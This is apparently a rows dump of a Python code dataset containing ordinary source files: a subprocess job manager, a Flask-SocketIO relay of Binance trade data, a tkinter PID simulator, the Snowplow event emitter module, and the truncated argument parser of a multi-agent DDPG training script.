source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
job.py
|
# Copyright (c) 2020 by Terry Greeniaus.
import threading
import json
import uuid
import os
import reap
class Job:
STATUS_PENDING = 0
STATUS_RUNNING = 1
STATUS_COMPLETE = 2
def __init__(self, name, module=None, function=None, args=(), kwargs=None,
cmd=None, cwd=None, notify_meta=None, notify_complete=None,
manager_notify=None):
self.name = name
self.module = module
self.function = function
self.args = args
self.kwargs = kwargs or {}
self.cmd = cmd or ['/usr/bin/env', 'python3',
'-m', 'jman.mod_func_loader']
self.cwd = cwd
self.notify_meta = notify_meta
self.notify_complete = [x for x in (manager_notify, notify_complete)
if x is not None]
self.uuid = uuid.uuid1()
self.status = Job.STATUS_PENDING
self.wfd = None
self.wfd_lock = threading.Lock()
self.thread = None
self.proc = None
self.meta = None
self.istate = None
self.error_log = None
@staticmethod
def from_mod_func(module, function, name=None, **kwargs):
assert 'cmd' not in kwargs
return Job(name, module=module, function=function, **kwargs)
@staticmethod
def from_cmd(cmd, name=None, **kwargs):
assert 'module' not in kwargs
assert 'function' not in kwargs
return Job(name, cmd=cmd, **kwargs)
def spawn(self):
self.status = Job.STATUS_RUNNING
self.thread = threading.Thread(target=self._workloop, daemon=True)
self.thread.start()
def join(self, timeout=None):
self.thread.join(timeout)
def get_status_str(self):
if self.status == Job.STATUS_PENDING:
return 'PENDING'
if self.status == Job.STATUS_RUNNING:
return 'RUNNING'
if self.status == Job.STATUS_COMPLETE:
return 'COMPLETE'
return '???'
def _write_istate(self):
# Assumes wfd_lock is held.
if self.wfd is not None:
self.wfd.write('INPUT: %s\n' % json.dumps(self.istate))
self.wfd.flush()
def set_istate(self, istate):
with self.wfd_lock:
self.istate = istate
self._write_istate()
def _workloop(self):
rfd, child_wfd = os.pipe()
child_rfd, wfd = os.pipe()
rfd = os.fdopen(rfd, 'r')
wfd = os.fdopen(wfd, 'w')
env = os.environ.copy()
if self.module:
env['JMAN_MODULE'] = self.module
if self.function:
env['JMAN_FUNCTION'] = self.function
if self.cwd:
env['JMAN_CWD'] = self.cwd
env['JMAN_RFD'] = str(child_rfd)
env['JMAN_WFD'] = str(child_wfd)
with self.wfd_lock:
self.wfd = wfd
self.proc = reap.Popen(self.cmd, pass_fds=(child_rfd, child_wfd),
env=env, cwd=self.cwd)
os.close(child_rfd)
os.close(child_wfd)
j = json.dumps({'uuid' : str(self.uuid),
'args' : self.args,
'kwargs' : self.kwargs,
})
wfd.write(j + '\n')
wfd.flush()
if self.istate is not None:
self._write_istate()
while True:
l = rfd.readline()
if not l:
break
cmd, _, data = l.partition(':')
if cmd == 'META':
self.meta = json.loads(data)
if self.notify_meta:
self.notify_meta(self)
elif cmd == 'ERROR_LOG':
self.error_log = json.loads(data)
self.proc.communicate()
self.status = Job.STATUS_COMPLETE
for f in self.notify_complete:
f(self)
|
server.py
|
import asyncio
import json
import threading
import flask
import websockets
from flask_socketio import SocketIO, emit, send
from flask_cors import CORS, cross_origin
host = "127.0.0.1"
port = 4040
app = flask.Flask(__name__)
app.config["DEBUG"] = True
app.config['CORS_HEADERS'] = 'Content-Type'
cors = CORS(app)
socketio = SocketIO(app, cors_allowed_origins="*")
@socketio.on('message')
def handle_message(message):
print(f'received message: {message}')
async def consumer_handler(frames):
async for frame in frames:
trade = json.loads(frame)
mappedTrade = {"symbol": trade['s'], "price": float(trade['p']), "quantity": float(trade['q'])}
socketio.emit("trade", mappedTrade)
async def connect():
async with websockets.connect("wss://stream.binance.com:9443/ws/btcusdt@trade") as ws:
await consumer_handler(ws)
def runSocketio():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(connect())
loop.run_forever()
print("deneme")
socketio.run(app, port=port)
if __name__ == "__main__":
print("App is starting...")
t = threading.Thread(target=runSocketio)
t.start()
|
PID.py
|
from tkinter import * #导入Tkinter模块
import tkinter.colorchooser
import tkinter.messagebox as messagebox
import threading
import datetime
import time
import math
import random
import sys
sys.setrecursionlimit(100000) #设置递归深度
root=Tk()
root.title("PID Simulator") #生成一个主窗口对象
root.geometry("885x550")
root.resizable(0,0)
#root.iconbitmap(".\\tk.ico")
MaxOutPut=65 #最大输出值
Timer_Flag=False
Timer_Itv=1
Adjust_Flag=False
Err_Accumulation=0.0
N_Cycle = 500
N_Tolerance = 0.05
N_Optimize_Cycle = 100
Data=[]
Kp_Min=[]
Kp_Max=[]
KKp=0
KKi=0
def Data_Init(flag):
global Data
global Err_Accumulation
global Kp_Min
global Kp_Max
global KKp
global Optimize_Cycle
if flag==0:
Err_Accumulation=0.0
Data.clear()
Data=[[0] * 100, [ 0 ] * 100, [0] * 100, [0]*100, [0]*100, [0]*100, [0]*100]
elif flag == 1:
Kp_Min.clear()
Kp_Min = [0]*100
Kp_Max.clear()
Kp_Max = [0]*100
Kp_Max[-1] = 10
Kp_Min[-1] = 0
KKp = Kp_Max[-1]
Optimize_Cycle=0
# 坐标转换
X_C = lambda x: x * 5 + 50
Y_C = lambda y: (4000 - 25 * y) / 11
# 数据输入块
SetInput = [50, 0, 0, 0, 1] #存储设定值,频率,输入类型,当前周期,增长模式
frmInput = Frame(root) #bd=2, relief=RIDGE,bg='yellow')
frmInput.grid(row=0, column=0, rowspan=2, padx=5, pady=5)
def Mysel(): #控制频率设置滑块
if SetInput[2] != Inputvar.get():
SetInput[2] = Inputvar.get()
Data_Init(0)
if Inputvar.get() == 0:
scaleSetF.set(0)
scaleSetF.config(state=DISABLED)
else:
scaleSetF.config(state=NORMAL)
dic = {0: '手 动 ', 1: '矩形波 ', 2: '三角波 ', 3: '正弦波 '}
Inputvar = IntVar()
Inputvar.set(0)
for i,j in dic.items():
RB=Radiobutton(frmInput,text=j,variable=Inputvar,value=i,command=Mysel)
RB.grid(row=i,column=0,padx=1,pady=1,sticky=W)
for i,j in {0:'S P :',1:'周期:'}.items():
Label(root,text=j).grid(row=i,column=1,padx=3,pady=3)
def SetP_Change(tt): #取设定值(幅值)
SetInput[0]=int(tt)
def SetF_Change(tt): #取频率
SetInput[1]=int(tt)
SetP=IntVar() #设定值,波形幅值
scaleSetP=Scale(root,orient=HORIZONTAL,variable=SetP,command=SetP_Change,
from_=0,to=100,resolution=5)
scaleSetP.set(SetInput[0])
scaleSetP.grid(row=0,column=2)
SetF=IntVar() #波形频率
scaleSetF=Scale(root,orient=HORIZONTAL,variable=SetF,command=SetF_Change,
from_=0,to=20.0,resolution=2,state=DISABLED)
scaleSetF.set(SetInput[1])
scaleSetF.grid(row=1,column=2)
#PID参数设置块
SetPara=[0.6,0.3,0.1] #存储Kp,Ki,Kd 的值
frmParameter=Frame()
frmParameter.grid(row=3,column=0,columnspan=3,padx=3,pady=1)
def Para_Set(tt,i): #取Kp,Ki,Kd的值
SetPara[i]=float(tt)
dic = {0:'Kp: ',1:'Ki: ',2:'Kd: '}
ScalePID=[]
for i,j in dic.items():
Label(frmParameter,text=j).grid(row=i,column=1,padx=8,pady=3)
Entry(frmParameter,width=12,textvariable=SetPara[i]
).grid(row=i,column=2,padx=10,pady=3)
SC=Scale(frmParameter,orient=HORIZONTAL,variable=SetPara[i],
command=lambda i=i,j=i:Para_Set(i,j),from_=0,to=10.0,resolution=0.05)
SC.set(SetPara[i])
ScalePID.append(SC)
SC.grid(row=i,column=3,padx=1,pady=1)
#运行参数与颜色设置块
def Myclick(tt):
TakeCol = tkinter.colorchooser.askcolor() #取颜色
#Buttons1[tt]['bg']=TakeCol[1] #按键赋新背景色
Buttons1[tt].config(bg=TakeCol[1]) #按键赋新背景色
CurveCol[tt]=TakeCol[1] #更新颜色列表
CurveName=['Up:','Ui:','Ud:','OP:','PV:','E :']
CurveVal=[StringVar(),StringVar(),StringVar(),StringVar(),StringVar(),StringVar()]
CurveCol=['#ffffff','#ffffff','#ffffff','#0000ff','#ff0000','#00ff00','#000000']
frmCurve=Frame()
frmCurve.grid(row=4,column=0,columnspan=3,padx=3,pady=3)
Buttons1=[]
for i in CurveName:
j=CurveName.index(i)
if j<3:
k=j
l=0
else:
k=j-3
l=3
Label(frmCurve,text=i).grid(row=k,column=l,padx=8,pady=3,sticky=W)
CurveVal[j].set('0.0000')
Label(frmCurve,width=10,textvariable=CurveVal[j],relief=SUNKEN
).grid(row=k,column=l+1,padx=3,pady=3)
BT=Button(frmCurve,width=3,command=lambda j=j:Myclick(j),bg=CurveCol[j])
BT.grid(row=k,column=l+2,padx=1,pady=1)
Buttons1.append(BT)
#系统参数设置块
SystemVar=['速度:','干扰:','惯性:','滞后:']
SystemVal=[11,0,6,6] #初始值
Down_Level=[1,0,1,1] #下限值
Up_Level=[20,10,10,10] #上限值
frmSystem=Frame()
frmSystem.grid(row=5,column=0,columnspan=3,padx=1,pady=1)
def Sys_Set(tt,i):
global SystemVal
global Timer_Itv
SystemVal[i]=int(tt)
if i==0:
Timer_Itv=2.1-SystemVal[0]/10
for i in SystemVar:
j=SystemVar.index(i)
Label(frmSystem,text=i).grid(row=j//2,column=j%2*2,padx=8,pady=3,sticky=W)
SC=Scale(frmSystem,orient=HORIZONTAL,variable=SystemVar[j],
command=lambda i=j,j=j:Sys_Set(i,j),from_=Down_Level[j],to=Up_Level[j])
SC.set(SystemVal[j])
SC.grid(row=j//2,column=j%2*2+1,padx=1,pady=1)
def Value_Test(content): #校检最大输出值的有效性
global MaxOutPut
if content == "" :
return True
elif content.isdigit() :
if float(content)>0 and float(content)<=100:
MaxOutPut=float(content)
return True
else:
return False
else:
return False
Label(root,text='最大输出:').grid(row=6,column=0,padx=8,pady=3,sticky=W)
Outputvar=StringVar()
Outputvar.set(str(MaxOutPut))
Value_Test_cmd=root.register(Value_Test) # 需要将函数包装一下,必要的
ET=Entry(root,width=12,textvariable=Outputvar,validate='key',validatecommand=(Value_Test_cmd,'%P'))
# %P表示 当输入框的值允许改变,该值有效。该值为当前文本框内容
ET.grid(row=6,column=1,padx=1,pady=1)
#设置绘图块
CV=Canvas(root,width=550,height=500,bg='white')
CV.grid(row=0,column=3,rowspan=6,columnspan=12,padx=3,pady=3,sticky=N)
def Draw_Canvas():
CV.delete(ALL)
CV.create_line(X_C(-5),Y_C(0),X_C(100),Y_C(0),fill='#888888',width=2)
CV.create_line(X_C(0),Y_C(150),X_C(0),Y_C(-50),fill='#888888',width=3)
CV.create_line(X_C(-1),Y_C(150),X_C(0),Y_C(150),fill='#888888',width=2)
CV.create_line(X_C(-1),Y_C(100),X_C(0),Y_C(100),fill='#888888',width=2)
CV.create_line(X_C(-1),Y_C(50),X_C(0),Y_C(50),fill='#888888',width=2)
CV.create_line(X_C(-1),Y_C(-50),X_C(0),Y_C(-50),fill='#888888',width=2)
CV.create_text(X_C(-4),Y_C(150),fill='#888888', text='150')
CV.create_text(X_C(-4),Y_C(100),fill='#888888', text='100')
CV.create_text(X_C(-3),Y_C(50),fill='#888888', text='50')
CV.create_text(X_C(-4),Y_C(-50),fill='#888888', text='-50')
def Time_Itv(): #当在函数Time_Itv()的参数中包括一个线程实例时
if Timer_Flag:
#print("当前时间:%s" % time.ctime())
Draw_Canvas() #绘图
if Adjust_Flag:
PID_Adjust()
else:
Do_Cal() #计算
time.sleep(Timer_Itv) #睡眠2s
Time_Itv() #回调自己,新的计时开始
#设置功能按钮块
def ButtonClick(tt):
#global Timer_Itv
global Timer_Flag
global Adjust_Flag
if tt==0: #模 拟
Adjust_Flag=False
if Timer_Flag:
Timer_Flag=False
Buttons2[0].config(text='模 拟')
else:
Timer_Flag=True
Buttons2[0].config(text='暂 停')
Data_Init(0)
ta = threading.Thread(target=Time_Itv,args=())
ta.start() #启动线程
elif tt==1: #复 位
Data_Init(0)
Data_Init(1)
Draw_Canvas()
elif tt==2: #整 定
Adjust_Flag=True
Timer_Flag=True
Buttons2[0].config(text='暂 停')
Data_Init(1)
ta = threading.Thread(target=Time_Itv,args=())
ta.start() #启动线程
elif tt==3: #关 于
messagebox.showinfo("关 于", "PID 仿真软件 V2.0\n\n"+
"主要用于PID相关知识学习与模拟\n\n"+
"Kp:增大,系统响应加快,静差缩小,但系统振荡增加,稳定性下降;\n"+
"Ki:增大,加快消除系统静差,但系统超调增加,稳定性下降;\n"+
"Kd:增大,系统灵敏度增加,系统振荡减弱,但系统对扰动的抑制能力减弱;\n\n"+
"惯性越大,KpKiKd指数级上升;\n"+"滞后越大,Kp无影响,Ki指数级下降,Kd线性上升;\n\n"+
"增量式PID算法\n系统定义:惯性+滞后\n\n参数自整定方法:4:1衰减法\n\n"+
"Author:gzhstar\n2021-5"
"")
elif tt==4: #退 出
My_End()
ButtonName=['模 拟','复 位','整 定','关 于','退 出']
Buttons2=[]
for i in ButtonName:
j=ButtonName.index(i)
BT=Button(root,text=i,command=lambda j=j:ButtonClick(j))
BT.grid(row=6,column=j+10,padx=1,pady=1)
Buttons2.append(BT)
Buttons2[1].config(state=DISABLED)
Data_Init(0)
Draw_Canvas()
def Do_Cal():
global Data
global SetInput
t=0 #计算设置值
if SetInput[1]>0: #波形
if SetInput[4]==1: #增长模式
SetInput[3]+=1
if SetInput[3]-SetInput[1]>=0:
SetInput[3]=SetInput[1]
SetInput[4]=0
else: #递减模式
SetInput[3]-=1
if SetInput[3]<=0:
SetInput[3]=0
SetInput[4]=1
if SetInput[2]==1: #矩形波
if SetInput[4]==1:
t=SetInput[0]
else:
t=0
elif SetInput[2]==2: #三角波
t=SetInput[0]/SetInput[1]*SetInput[3]
else: #正弦波
t=SetInput[0]*(math.sin((SetInput[1]/2-SetInput[3])/SetInput[1]*3.14)+1)/2
else: #设置值,手动
t=SetInput[0]
del Data[6][0] #删除第一个数据
Data[6].append(t) #增加最后个数据
Do_PID(SetPara[0],SetPara[1],SetPara[2],1)
for i in range(len(CurveVal)): #显示数据
CurveVal[i].set(str(Data[i][-1])[0:8])
for j in range(len(Data)): #绘制曲线
#t=Data[j][99]+random.randint(-5,5)
tmp=[]
for i in range(100):
tmp.append(X_C(i))
tmp.append(Y_C(Data[j][i]))
CV.create_line(tmp,fill=CurveCol[j])
def Do_PID(Kp,Ki,Kd,flag):
#['Up:','Ui:','Ud:','OP:','PV:','E :','SV']
global Data
global Err_Accumulation
global SystemVal #['速度:','干扰:','惯性:','滞后:']
for i in range(len(Data)-1):
del Data[i][0]
Data[0].append(Kp*(Data[5][-1]-Data[5][-2])) #Up
Data[1].append(Ki*Data[5][-1]) #Ui
Data[2].append(Kd*(Data[5][-1]+Data[5][-3]-2*Data[5][-2])) #Ud
opv=Data[4][-1]+Data[0][-1]+Data[1][-1]+Data[2][-1]
if opv>MaxOutPut:
opv=MaxOutPut
if opv<-MaxOutPut:
opv=-MaxOutPut
Data[3].append(opv) #OP
if flag!=0: #整定时去除干扰
opv=opv+random.randint(-1.0,1.0)*SystemVal[1]/10 #干扰
opv=opv*(1-SystemVal[2]/11)+Data[4][-1]*SystemVal[2]/11 #惯性
Data[4].append(opv) #PV
Data[5].append(Data[6][-1]-Data[4][-SystemVal[3]]) #E(一阶滞后)
def PID_Adjust(): #PID整定
global Timer_Flag
global Kp_Min
global Kp_Max
global Optimize_Cycle
global KKp
global KKi
global ScalePID
global SetPara
KKi_Cycle=0
KKK=0
Inflexion1,Inflexion2,Inflexion3=0.0,0.0,0.0
Optimize_Cycle+=1
if Optimize_Cycle>N_Optimize_Cycle:
Adjust_Flag=False
Timer_Flag=False
messagebox.showinfo("信 息", "优化未成功。优化次数内,未找合适的参数。")
flag=0 #找波峰标志
j=0
Data_Init(0) #复位数据
Data[6][-1]=50
while j<N_Cycle:
j+=1
#del Data[6][0] #删除第一个数据
#Data[6].append(SetInput[0]) #增加最后个数据
Do_PID(KKp,0,0,0)
if flag==1:
KKi_Cycle+=1
if Data[5][-2]-Data[5][-1]>=0 and Data[5][-2]>Data[5][-3]:
KKK=KKi_Cycle
Inflexion2=Data[5][-2]
if Data[5][-1]-Data[5][-2]>=0 and Data[5][-3]-Data[5][-2]>0.0001 and j>SystemVal[3]: #找波峰
if flag==1: #第二个波峰
KKi=KKi_Cycle #第二个波峰与第一个之间的周期数
Inflexion3=Data[5][-2] #第二个波峰最大误差值
break
if flag==0: #第一个波峰
flag=1
KKi_Cycle=0
Inflexion1=Data[5][-2]
if j>=N_Cycle:
Adjust_Flag=False
Timer_Flag=False
messagebox.showinfo("信 息", "优化未成功。未找到两个匹配波峰。")
else:
#缩小范围
Tolerance=(Inflexion2-Inflexion1)-(Inflexion2-Inflexion3)*2
if abs(Tolerance)<=N_Tolerance or Kp_Max[-1]-Kp_Min[-1]<=N_Tolerance/100:
Adjust_Flag=False
Timer_Flag=False
SetPara[0]=0.6*KKp
SetPara[1]=SetPara[0]/(0.18*KKi)
SetPara[2]=SetPara[0]*(0.02*KKi)
for k in range(3):
ScalePID[k].set(SetPara[k])
messagebox.showinfo("信 息","优化成功。"+"\n\n Kp: "+str(SetPara[0])[0:4]+
"\n Ki: "+str(SetPara[1])[0:4]+"\n Kd: "+str(SetPara[2])[0:4])
else:
if Tolerance > 0:
del Kp_Min[0]
del Kp_Max[0]
Kp_Min.append(KKp)
Kp_Max.append(Kp_Max[-1])
KKp +=(Kp_Max[-1] - Kp_Min[-1]) / 3
else:
del Kp_Min[0]
del Kp_Max[0]
Kp_Min.append(Kp_Min[-1])
Kp_Max.append(KKp)
KKp -= (Kp_Max[-1] - Kp_Min[-1]) / 3
for i in range(100):
if Kp_Min[i]+Kp_Max[i]>0:
CV.create_rectangle(X_C(i),Y_C(Kp_Min[i]*10),
X_C(i+1),Y_C(Kp_Max[i]*10),fill='#00ff00')
def My_End():
global Timer_Flag
Timer_Flag=False
time.sleep(2)
#messagebox.showinfo("退出","退出程序!")
root.quit()
#root.destroy()
root.protocol("WM_DELETE_WINDOW", My_End)
root.mainloop()
|
emitters.py
|
"""
emitters.py
Copyright (c) 2013-2014 Snowplow Analytics Ltd. All rights reserved.
This program is licensed to you under the Apache License Version 2.0,
and you may not use this file except in compliance with the Apache License
Version 2.0. You may obtain a copy of the Apache License Version 2.0 at
http://www.apache.org/licenses/LICENSE-2.0.
Unless required by applicable law or agreed to in writing,
software distributed under the Apache License Version 2.0 is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
express or implied. See the Apache License Version 2.0 for the specific
language governing permissions and limitations there under.
Authors: Anuj More, Alex Dean, Fred Blundun
Copyright: Copyright (c) 2013-2014 Snowplow Analytics Ltd
License: Apache License Version 2.0
"""
import json
import logging
import time
import threading
try:
# Python 2
from Queue import Queue
except ImportError:
# Python 3
from queue import Queue
import redis
import requests
from contracts import contract, new_contract
from snowplow_tracker.self_describing_json import SelfDescribingJson
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
DEFAULT_MAX_LENGTH = 10
PAYLOAD_DATA_SCHEMA = "iglu:com.snowplowanalytics.snowplow/payload_data/jsonschema/1-0-4"
new_contract("protocol", lambda x: x == "http" or x == "https")
new_contract("method", lambda x: x == "get" or x == "post")
new_contract("function", lambda x: hasattr(x, "__call__"))
new_contract("redis", lambda x: isinstance(x, (redis.Redis, redis.StrictRedis)))
class Emitter(object):
"""
Synchronously send Snowplow events to a Snowplow collector
Supports both GET and POST requests
"""
@contract
def __init__(self, endpoint, protocol="http", port=None, method="get", buffer_size=None, on_success=None, on_failure=None, byte_limit=None):
"""
:param endpoint: The collector URL. Don't include "http://" - this is done automatically.
:type endpoint: string
:param protocol: The protocol to use - http or https. Defaults to http.
:type protocol: protocol
:param port: The collector port to connect to
:type port: int | None
:param method: The HTTP request method
:type method: method
:param buffer_size: The maximum number of queued events before the buffer is flushed. Default is 10.
:type buffer_size: int | None
:param on_success: Callback executed after every HTTP request in a flush has status code 200
Gets passed the number of events flushed.
:type on_success: function | None
:param on_failure: Callback executed if at least one HTTP request in a flush has status code 200
Gets passed two arguments:
1) The number of events which were successfully sent
2) If method is "post": The unsent data in string form;
If method is "get": An array of dictionaries corresponding to the unsent events' payloads
:type on_failure: function | None
:param byte_limit: The size event list after reaching which queued events will be flushed
:type byte_limit: int | None
"""
self.endpoint = Emitter.as_collector_uri(endpoint, protocol, port, method)
self.method = method
if buffer_size is None:
if method == "post":
buffer_size = DEFAULT_MAX_LENGTH
else:
buffer_size = 1
self.buffer_size = buffer_size
self.buffer = []
self.byte_limit = byte_limit
self.bytes_queued = None if byte_limit is None else 0
self.on_success = on_success
self.on_failure = on_failure
self.lock = threading.RLock()
self.timer = None
logger.info("Emitter initialized with endpoint " + self.endpoint)
@staticmethod
@contract
def as_collector_uri(endpoint, protocol="http", port=None, method="get"):
"""
:param endpoint: The raw endpoint provided by the user
:type endpoint: string
:param protocol: The protocol to use - http or https
:type protocol: protocol
:param port: The collector port to connect to
:type port: int | None
:param method: Either `get` or `post` HTTP method
:type method: method
:rtype: string
"""
if method == "get":
path = "/i"
else:
path = "/com.snowplowanalytics.snowplow/tp2"
if port is None:
return protocol + "://" + endpoint + path
else:
return protocol + "://" + endpoint + ":" + str(port) + path
@contract
def input(self, payload):
"""
Adds an event to the buffer.
If the maximum size has been reached, flushes the buffer.
:param payload: The name-value pairs for the event
:type payload: dict(string:*)
"""
with self.lock:
if self.bytes_queued is not None:
self.bytes_queued += len(str(payload))
if self.method == "post":
self.buffer.append({key: str(payload[key]) for key in payload})
else:
self.buffer.append(payload)
if self.reached_limit():
self.flush()
def reached_limit(self):
"""
Checks if event-size or bytes limit are reached
:rtype: bool
"""
if self.byte_limit is None:
return len(self.buffer) >= self.buffer_size
else:
return self.bytes_queued >= self.byte_limit or len(self.buffer) >= self.buffer_size
def flush(self):
"""
Sends all events in the buffer to the collector.
"""
with self.lock:
self.send_events(self.buffer)
self.buffer = []
if self.bytes_queued is not None:
self.bytes_queued = 0
@contract
def http_post(self, data):
"""
:param data: The array of JSONs to be sent
:type data: string
"""
logger.info("Sending POST request to %s..." % self.endpoint)
logger.debug("Payload: %s" % data)
r = requests.post(self.endpoint, data=data, headers={'content-type': 'application/json; charset=utf-8'})
getattr(logger, "info" if self.is_good_status_code(r.status_code) else "warn")("POST request finished with status code: " + str(r.status_code))
return r
@contract
def http_get(self, payload):
"""
:param payload: The event properties
:type payload: dict(string:*)
"""
logger.info("Sending GET request to %s..." % self.endpoint)
logger.debug("Payload: %s" % payload)
r = requests.get(self.endpoint, params=payload)
getattr(logger, "info" if self.is_good_status_code(r.status_code) else "warn")("GET request finished with status code: " + str(r.status_code))
return r
def sync_flush(self):
"""
Calls the flush method of the base Emitter class.
This is guaranteed to be blocking, not asynchronous.
"""
logger.debug("Starting synchronous flush...")
Emitter.flush(self)
logger.info("Finished synchrous flush")
@staticmethod
@contract
def is_good_status_code(status_code):
"""
:param status_code: HTTP status code
:type status_code: int
:rtype: bool
"""
return 200 <= status_code < 400
@contract
def send_events(self, evts):
"""
:param evts: Array of events to be sent
:type evts: list(dict(string:*))
"""
if len(evts) > 0:
logger.info("Attempting to send %s requests" % len(evts))
Emitter.attach_sent_timestamp(evts)
if self.method == 'post':
data = SelfDescribingJson(PAYLOAD_DATA_SCHEMA, evts).to_string()
post_succeeded = False
try:
status_code = self.http_post(data).status_code
post_succeeded = self.is_good_status_code(status_code)
except requests.RequestException as e:
logger.warn(e)
if post_succeeded:
if self.on_success is not None:
self.on_success(len(evts))
elif self.on_failure is not None:
self.on_failure(0, evts)
elif self.method == 'get':
success_count = 0
unsent_requests = []
for evt in evts:
get_succeeded = False
try:
status_code = self.http_get(evt).status_code
get_succeeded = self.is_good_status_code(status_code)
except requests.RequestException as e:
logger.warn(e)
if get_succeeded:
success_count += 1
else:
unsent_requests.append(evt)
if len(unsent_requests) == 0:
if self.on_success is not None:
self.on_success(success_count)
elif self.on_failure is not None:
self.on_failure(success_count, unsent_requests)
else:
logger.info("Skipping flush since buffer is empty")
@contract
def set_flush_timer(self, timeout, flush_now=False):
"""
Set an interval at which the buffer will be flushed
:param timeout: interval in seconds
:type timeout: int | float
:param flush_now: immediately flush buffer
:type flush_now: bool
"""
# Repeatable create new timer
if flush_now:
self.flush()
self.timer = threading.Timer(timeout, self.set_flush_timer, [timeout, True])
self.timer.daemon = True
self.timer.start()
def cancel_flush_timer(self):
"""
Abort automatic async flushing
"""
if self.timer is not None:
self.timer.cancel()
@staticmethod
def attach_sent_timestamp(events):
"""
Attach (by mutating in-place) current timestamp in milliseconds
as `stm` param
:param events: Array of events to be sent
:type events: list(dict(string:*))
:rtype: None
"""
def update(e):
e.update({'stm': str(int(time.time()) * 1000)})
[update(event) for event in events]
class AsyncEmitter(Emitter):
"""
Uses threads to send HTTP requests asynchronously
"""
@contract
def __init__(
self,
endpoint,
protocol="http",
port=None,
method="get",
buffer_size=None,
on_success=None,
on_failure=None,
thread_count=1,
byte_limit=None):
"""
:param endpoint: The collector URL. Don't include "http://" - this is done automatically.
:type endpoint: string
:param protocol: The protocol to use - http or https. Defaults to http.
:type protocol: protocol
:param port: The collector port to connect to
:type port: int | None
:param method: The HTTP request method
:type method: method
:param buffer_size: The maximum number of queued events before the buffer is flushed. Default is 10.
:type buffer_size: int | None
:param on_success: Callback executed after every HTTP request in a flush has status code 200
Gets passed the number of events flushed.
:type on_success: function | None
:param on_failure: Callback executed if at least one HTTP request in a flush has status code 200
Gets passed two arguments:
1) The number of events which were successfully sent
2) If method is "post": The unsent data in string form;
If method is "get": An array of dictionaries corresponding to the unsent events' payloads
:type on_failure: function | None
:param thread_count: Number of worker threads to use for HTTP requests
:type thread_count: int
:param byte_limit: The size event list after reaching which queued events will be flushed
:type byte_limit: int | None
"""
super(AsyncEmitter, self).__init__(endpoint, protocol, port, method, buffer_size, on_success, on_failure, byte_limit)
self.queue = Queue()
for i in range(thread_count):
t = threading.Thread(target=self.consume)
t.daemon = True
t.start()
def sync_flush(self):
while True:
self.flush()
self.queue.join()
if len(self.buffer) < 1:
break
def flush(self):
"""
Removes all dead threads, then creates a new thread which
executes the flush method of the base Emitter class
"""
with self.lock:
self.queue.put(self.buffer)
self.buffer = []
if self.bytes_queued is not None:
self.bytes_queued = 0
def consume(self):
while True:
evts = self.queue.get()
self.send_events(evts)
self.queue.task_done()
class CeleryEmitter(Emitter):
"""
Uses a Celery worker to send HTTP requests asynchronously.
Works like the base Emitter class,
but on_success and on_failure callbacks cannot be set.
"""
def __init__(self, endpoint, protocol="http", port=None, method="get", buffer_size=None, byte_limit=None):
super(CeleryEmitter, self).__init__(endpoint, protocol, port, method, buffer_size, None, None, byte_limit)
def flush(self):
"""
Schedules a flush task
"""
super(CeleryEmitter, self).flush.delay()
logger.info("Scheduled a Celery task to flush the event queue")
class RedisEmitter(object):
"""
Sends Snowplow events to a Redis database
"""
@contract
def __init__(self, rdb=None, key="snowplow"):
"""
:param rdb: Optional custom Redis database
:type rdb: redis | None
:param key: The Redis key for the list of events
:type key: string
"""
if rdb is None:
rdb = redis.StrictRedis()
self.rdb = rdb
self.key = key
@contract
def input(self, payload):
"""
:param payload: The event properties
:type payload: dict(string:*)
"""
logger.debug("Pushing event to Redis queue...")
self.rdb.rpush(self.key, json.dumps(payload))
logger.info("Finished sending event to Redis.")
def flush(self):
logger.warn("The RedisEmitter class does not need to be flushed")
def sync_flush(self):
self.flush()
|
main_vec_dist_SeqMod.py
|
import argparse
import math
from collections import namedtuple
from itertools import count
import numpy as np
from eval import eval_model_q
import copy
import torch
from ddpg_vec import DDPG
from ddpg_vec_hetero import DDPGH
import random
import pickle
from replay_memory import ReplayMemory, Transition, ReplayMemory_episode
from utils import *
import os
import time
from utils import n_actions, copy_actor_policy
from ddpg_vec import hard_update
import torch.multiprocessing as mp
from multiprocessing import Queue
from multiprocessing.sharedctypes import Value
import sys
from pathlib import Path
save_path = str(Path(os.path.abspath(__file__)).parents[2]) + '/results'
save_model_path = save_path + '/ckpt_plot'
tensorboard_path = save_path + '/runs'
sys.path.append(str(Path(os.path.abspath(__file__)).parents[1])+'/former')
sys.path.append(str(Path(os.path.abspath(__file__)).parents[1])+'/maddpg')
sys.path.append(str(Path(os.path.abspath(__file__)).parents[1]))
import numpy as np
import torch
from former import util
from former.util import d, here
import former
from torch import nn
import torch.nn.functional as F
from torch.utils.tensorboard import SummaryWriter
parser = argparse.ArgumentParser(description='PyTorch REINFORCE example')
parser.add_argument('--scenario', required=True,
help='name of the environment to run')
parser.add_argument('--gamma', type=float, default=0.95, metavar='G',
help='discount factor for reward (default: 0.99)')
parser.add_argument('--tau', type=float, default=0.01, metavar='G',
help='discount factor for model (default: 0.001)')
parser.add_argument('--ou_noise', type=bool, default=True)
parser.add_argument('--param_noise', type=bool, default=False)
parser.add_argument('--train_noise', default=False, action='store_true')
parser.add_argument('--noise_scale', type=float, default=0.3, metavar='G',
help='initial noise scale (default: 0.3)')
parser.add_argument('--final_noise_scale', type=float, default=0.3, metavar='G',
help='final noise scale (default: 0.3)')
parser.add_argument('--exploration_end', type=int, default=60000, metavar='N',
help='number of episodes with noise (default: 100)')
parser.add_argument('--seed', type=int, default=0, metavar='N',
help='random seed (default: 0)')
parser.add_argument('--batch_size', type=int, default=1024, metavar='N',
help='batch size (default: 128)')
parser.add_argument('--num_steps', type=int, default=25, metavar='N',
help='max episode length (default: 1000)')
parser.add_argument('--num_episodes', type=int, default=100000, metavar='N',
help='number of episodes (default: 1000)')
parser.add_argument('--hidden_size', type=int, default=128, metavar='N',
help='number of episodes (default: 128)')
parser.add_argument('--updates_per_step', type=int, default=8, metavar='N',
help='model updates per simulator step (default: 5)')
parser.add_argument('--critic_updates_per_step', type=int, default=8, metavar='N',
help='model updates per simulator step (default: 5)')
parser.add_argument('--replay_size', type=int, default=1000000, metavar='N',
help='size of replay buffer (default: 1000000)')
parser.add_argument('--actor_lr', type=float, default=1e-2,
help='(default: 1e-4)')
parser.add_argument('--critic_lr', type=float, default=1e-2,
help='(default: 1e-3)')
